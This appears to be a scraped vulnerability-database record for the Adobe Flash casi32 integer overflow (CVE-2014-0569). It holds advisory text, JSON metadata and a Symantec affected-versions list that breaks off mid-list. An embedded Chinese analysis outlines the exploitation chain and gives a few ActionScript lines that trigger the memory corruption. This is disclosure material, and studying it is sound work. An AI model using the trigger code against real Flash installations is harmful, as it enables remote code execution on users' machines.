Adobe Flash Player casi32 Integer Overflow Remote Code Execution Vulnerability
2014-10-14T00:00:00
ID ZDI-14-365 Type zdi Reporter bilou Modified 2014-11-09T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the implementation of casi32. The issue lies in the failure to properly sanitize a user-supplied length value with a specific array implementation. An attacker can leverage this vulnerability to execute code within the context of the current process.
{"hash": "a907f566e878cca74ace63dbf400ba9dd86799d1c6636bfed587d1dee6f969cd", "edition": 2, "title": "Adobe Flash Player casi32 Integer Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the implementation of casi32. The issue lies in the failure to properly sanitize a user-supplied length value with a specific array implementation. An attacker can leverage this vulnerability to execute code within the context of the current process.", "viewCount": 5, "objectVersion": "1.2", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "6b877bc90a1e396dae63f5ef3bb2384d", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "a780c8049d62bf92f369899c3a535eb2", "key": "description"}, {"hash": "df7e343799e1cc45f719e13469970c3f", "key": "href"}, {"hash": "0e8f4f13c11de32dac689cf2a0ab4284", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "c3560fb562d22673fe089f080adde204", "key": "published"}, {"hash": "28263da4b93d2ffdf948fd76640d9381", "key": "references"}, {"hash": "4221f9947c32b7d4ed08fb955e6ba8d2", "key": "reporter"}, {"hash": "7d2f1e6f63df74452a000a6420f62f75", "key": "title"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}], "cvelist": ["CVE-2014-0569"], "bulletinFamily": "info", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-365", "history": [{"bulletin": {"hash": "1d0e34f226dd8efef57a6bfeefb44678f98544d2c1dc730f3d74911e5467ca04", "id": "ZDI-14-365", "title": "Adobe Flash Player casi32 Integer Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the implementation of casi32. The issue lies in the failure to properly sanitize a user-supplied length value with a specific array implementation. An attacker can leverage this vulnerability to execute code within the context of the current process.", "viewCount": 0, "objectVersion": "1.2", "hashmap": [{"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}, {"hash": "7d2f1e6f63df74452a000a6420f62f75", "key": "title"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "28263da4b93d2ffdf948fd76640d9381", "key": "references"}, {"hash": "c3560fb562d22673fe089f080adde204", "key": "published"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "a780c8049d62bf92f369899c3a535eb2", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "6b877bc90a1e396dae63f5ef3bb2384d", "key": "cvelist"}, {"hash": "4221f9947c32b7d4ed08fb955e6ba8d2", "key": "reporter"}, {"hash": "df7e343799e1cc45f719e13469970c3f", "key": "href"}, {"hash": "9a10e9ed12ba0880a3e4c132dbded84d", "key": "modified"}], "cvelist": ["CVE-2014-0569"], "bulletinFamily": "info", "published": "2014-10-14T00:00:00", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb14-22.html"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "reporter": "bilou", "lastseen": "2016-09-04T11:33:49", "history": [], "modified": "2014-09-04T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-365", "type": "zdi"}, "lastseen": "2016-09-04T11:33:49", "edition": 1, "differentElements": ["modified"]}], "id": "ZDI-14-365", "reporter": "bilou", "published": "2014-10-14T00:00:00", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb14-22.html"], "lastseen": "2016-11-09T00:18:02", "modified": "2014-11-09T00:00:00", "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2016-11-09T00:18:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0569"]}, {"type": "symantec", "idList": ["SMNTC-70441"]}, {"type": "seebug", "idList": ["SSV:90366"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131382"]}, {"type": "threatpost", "idList": ["THREATPOST:FF33896826D8E265964D6C8BDFB7FEEA", "THREATPOST:C556A86F578A25714343E05BBFC4D7DD", "THREATPOST:51AE17332E02AA24542CD19B500F69C3", "THREATPOST:D2E078B72EFC850200253645E789C5C2", "THREATPOST:2B0F6242C9EF7ABD2CC3142F2254E2A3"]}, {"type": "exploitdb", "idList": ["EDB-ID:36744"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_CASI32_INT_OVERFLOW"]}, {"type": "zdt", "idList": ["1337DAY-ID-23503"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851067", "OPENVAS:1361412562310850863", "OPENVAS:1361412562310805002", "OPENVAS:1361412562310805006", "OPENVAS:1361412562310805003", "OPENVAS:1361412562310805005", "OPENVAS:1361412562310805004", "OPENVAS:1361412562310121281"]}, {"type": "suse", "idList": ["SUSE-SU-2014:1423-1", "SUSE-SU-2014:1360-1", "OPENSUSE-SU-2015:0725-1"]}, {"type": "nessus", "idList": ["OPENSUSE-2014-603.NASL", "SUSE_11_FLASH-PLAYER-141020.NASL", "REDHAT-RHSA-2014-1648.NASL", "MACOSX_GOOGLE_CHROME_38_0_2125_104.NASL", "ADOBE_AIR_APSB14-22.NASL", "MACOSX_FLASH_PLAYER_15_0_0_189.NASL", "MACOSX_ADOBE_AIR_15_0_0_293.NASL", "SMB_KB3001237.NASL", "GOOGLE_CHROME_38_0_2125_104.NASL", "FLASH_PLAYER_APSB14-22.NASL"]}, {"type": "redhat", "idList": ["RHSA-2014:1648"]}, {"type": "gentoo", "idList": ["GLSA-201411-06"]}], "modified": "2016-11-09T00:18:02"}, "vulnersScore": 6.9}, "type": "zdi"}
{"cve": [{"lastseen": "2019-05-29T18:13:43", "bulletinFamily": "NVD", "description": "Integer overflow in Adobe Flash Player before 13.0.0.250 and 14.x and 15.x before 15.0.0.189 on Windows and OS X and before 11.2.202.411 on Linux, Adobe AIR before 15.0.0.293, Adobe AIR SDK before 15.0.0.302, and Adobe AIR SDK & Compiler before 15.0.0.302 allows attackers to execute arbitrary code via unspecified vectors.", "modified": "2017-10-07T01:29:00", "id": "CVE-2014-0569", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0569", "published": "2014-10-15T10:55:00", "title": "CVE-2014-0569", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:19:29", "bulletinFamily": "exploit", "description": "### \u6f0f\u6d1e\u7c7b\u578b\uff1a\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e\r\n### \u5f71\u54cd\u7ec4\u4ef6\u4ecb\u7ecd\uff1aAdobe Flash Player\u3001Adobe AIR SDK\u548cAdobe AIR SDK & Compiler\u90fd\u662f\u7f8e\u56fd\u5965\u591a\u6bd4\uff08Adobe\uff09\u516c\u53f8\u7684\u4ea7\u54c1\u3002Adobe Flash Player\u662f\u4e00\u6b3e\u591a\u5a92\u4f53\u64ad\u653e\u5668\u4ea7\u54c1\uff1bAdobe AIR SDK\u548cAdobe AIR SDK & Compiler\u90fd\u662f\u9002\u7528\u4e8eAdobe AIR\uff08\u4e00\u4e2a\u8de8\u64cd\u4f5c\u7cfb\u7edf\u7684\u8fd0\u884c\u65f6\u73af\u5883\uff09\u7684\u6807\u51c6\u5f00\u53d1\u5de5\u5177\u5305\u3002 \r\n## \u6f0f\u6d1e\u5206\u6790\uff1a\r\n### \u539f\u56e0\uff1a\r\naction script 3.0\u4e2davm2.intrinsics.memory.casi32\u51fd\u6570\u5728\u8fdb\u884c\u5185\u5b58\u64cd\u4f5c\u65f6\uff0c\u53d1\u751f\u6574\u6570\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6ca1\u6709\u6b63\u786e\u68c0\u67e5\u5230\u5185\u5b58\u64cd\u4f5c\u7684\u504f\u79fb\uff0c\u5bfc\u81f4\u5185\u5b58\u8d8a\u754c\u8bfb\u5199\u3002\u53ef\u4f7fUint Vector\u7684length\u5b57\u6bb5\u88ab\u6539\u5199\uff0c\u8fdb\u800c\u4f7f\u7528ActionScript3\u7684Sound\u5bf9\u8c61\uff0c\u6cc4\u9732\u57fa\u5730\u5740\uff0c\u6784\u9020ROP\uff0c\u8fd0\u884cshellcode\uff0c\u7b49\u7b49\u3002\r\n### \u8be6\u7ec6\u5206\u6790\uff1a</br>\r\ncasi32\u51fd\u6570\uff1acasi32\u662fActionScript3\u91cc\u9762\u7528\u6765\u64cd\u4f5cdomainMemory\u7684\u51fd\u6570\u4e4b\u4e00\uff0cdomainMemory\u662f\u7528\u6765\u52a0\u901f\u5185\u5b58\u8bfb\u5199\u64cd\u4f5c\u800c\u52a0\u5165\u7684\u5de5\u5177\u7c7b\u3002\r\ncasi32(addr:int, expectedVal:int, newVal:int):int\r\n\u8be5\u51fd\u6570\u7684\u8bed\u610f\u662f\uff1a\u201dCompare And Swap\u201d \uff08\u6bd4\u8f83\u5e76\u4ea4\u6362\uff09\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570addr\u8868\u793a\u64cd\u4f5c\u7684\u5185\u5b58\u5730\u5740\uff08\u76f8\u5bf9\u4e8edomainMemory\uff09\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570expectedVal\u8868\u793a\u8981\u6bd4\u8f83\u7684\u503c\uff0c\u800c\u6700\u540e\u4e00\u4e2a\u53c2\u6570newVal\u662f\u8981\u4ea4\u6362\u7684\u503c\u3002\r\n\r\n\u8be5\u51fd\u6570\u5185\u90e8\u673a\u5236\u4e2d\u5b58\u5728\u957f\u5ea6\u68c0\u67e5\u65f6\u7684\u6574\u6570\u6ea2\u51fa\uff0c\u5bfc\u81f4\u68c0\u67e5\u4e0d\u6b63\u786e\uff1b\uff08\u5177\u4f53\u8c03\u8bd5\u8fc7\u7a0b\u89c1[http://weibo.com/p/1001603769606924861349](http://)\u6216[https://blogs.technet.microsoft.com/mmpc/2014/11/05/cracking-the-cve-2014-0569-nutshell/](http://)\uff09\uff0c\r\n\u8fd9\u6837\uff0c\u6211\u4eec\u53ef\u4ee5\u6784\u9020\u5229\u7528\u6761\u4ef6\uff0c\u9996\u5148\u5229\u7528flash vector\u5728\u5185\u5b58\u4e2d\u5efa\u7acbByteArray\u548cUint Vector\u76f8\u8fde\u7684\u5e03\u5c40\uff1b\r\n\r\n### \u4ee3\u7801:\r\n//\u9884\u5148\u5b9a\u4e49\u7684ByteArray\u5bf9\u8c61\uff0c\u5927\u5c0f\u4e3a0x1000\r\n\r\n```\r\n1._local3 = (this.orlyfx[_local1] as ByteArray);\r\n```\r\n//domainMemory\u503c\u8bbe\u4e3a_local3\uff1b\r\n```\r\n2.ApplicationDomain.currentDomain.domainMemory = _local3;\r\n```\r\n//\u6bd4\u8f83_local3\u4e0e0x1000\u5927\u5c0f\uff1b\u76f8\u7b49\u5219\u5c06_local\u957f\u5ea6\u8bbe\u4e3a0\r\n//\u4f46\u5185\u5b58\u4e0d\u4f1a\u7acb\u5373\u91ca\u653e\uff0c\u5bf9\u5e94\u6570\u7ec4\u8fd8\u4fdd\u63010x1000\u5b57\u8282\u7684\u5185\u5b58\r\n```\r\n3._local3.atomicCompareAndSwapLength(0x1000, 0);\r\n```\r\n//\u8c03\u7528casi32\uff0ccasi32\u51fd\u6570\u5185\u7531\u4e8e\u6574\u6570\u6ea2\u51fa\u9020\u6210\u6267\u884c\u6d41\u6539\u53d8\uff0c\u81f4\u4f7f\u5411_loc3\u504f\u79fb0x1000\u5904\u6210\u529f\u5199\u51650x40000001\r\n```\r\n4.if(casi32(0x1000, 1022, 0x40000001) == 1022)\r\n```\r\n\r\n\u540e\u7eed\u4f7f\u7528ActionScript3\u7684Sound\u5bf9\u8c61\uff0c\u6cc4\u9732\u57fa\u5730\u5740\uff0c\u6784\u9020ROP\uff0c\u8fd0\u884cshellcode\u5177\u4f53\u4ee3\u7801\u53ef\u89c1[http://www.myhack58.com/Article/html/3/62/2014/56259_2.htm\r\n](http://)", "modified": "2016-01-11T00:00:00", "published": "2016-01-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90366", "id": "SSV:90366", "type": "seebug", "title": "\u591a\u6b3eAdobe\u4ea7\u54c1\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1eCVE-2014-0569", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "symantec": [{"lastseen": "2018-03-14T06:07:58", "bulletinFamily": "software", "description": "### Description\n\nAdobe Flash Player and AIR are prone to an unspecified integer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3650 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n * Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 \n * Adobe AIR 3.9.0.1030 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1390 SDK \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR 4.0.0.1628 SDK \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Adobe Air Sdk 13.0.0.111 \n * Adobe Adobe Air Sdk 13.0.0.83 \n * Adobe Adobe Air Sdk 14.0.0.110 \n * Adobe Adobe Air Sdk 14.0.0.137 \n * Adobe Adobe Air Sdk 3.0.0.4080 \n * Adobe Adobe Air Sdk 3.1.0.488 \n * Adobe Adobe Air Sdk 3.2.0.2070 \n * Adobe Adobe Air Sdk 3.3.0.3650 \n * Adobe Adobe Air Sdk 3.3.0.3690 \n * Adobe Adobe Air Sdk 3.4.0.2540 \n * Adobe Adobe Air Sdk 3.4.0.2710 \n * Adobe Adobe Air Sdk 3.5.0.1060 \n * Adobe Adobe Air Sdk 3.5.0.600 \n * Adobe Adobe Air Sdk 3.5.0.880 \n * Adobe Adobe Air Sdk 3.5.0.890 \n * Adobe Adobe Air Sdk 3.6.0.599 \n * Adobe Adobe Air Sdk 3.6.0.6090 \n * Adobe Adobe Air Sdk 3.7.0.1530 \n * Adobe Adobe Air Sdk 3.7.0.1860 \n * Adobe Adobe Air Sdk 3.7.0.2090 \n * Adobe Adobe Air Sdk 3.8.0.1430 \n * Adobe Adobe Air Sdk 3.8.0.870 \n * Adobe Adobe Air Sdk 3.8.0.910 \n * Adobe Adobe Air Sdk 3.9.0.1030 \n * Adobe Adobe Air Sdk 3.9.0.1210 \n * Adobe Adobe Air Sdk 3.9.0.1380 \n * Adobe Adobe Air Sdk 4.0.0.1390 \n * Adobe Adobe Air Sdk 4.0.0.1628 \n * Adobe Adobe Flash Player 11 11.7 \n * Adobe Adobe Flash Player 11.1.115.17 \n * Adobe Adobe Flash Player 11.6.602.180 \n * Adobe Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 2 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n 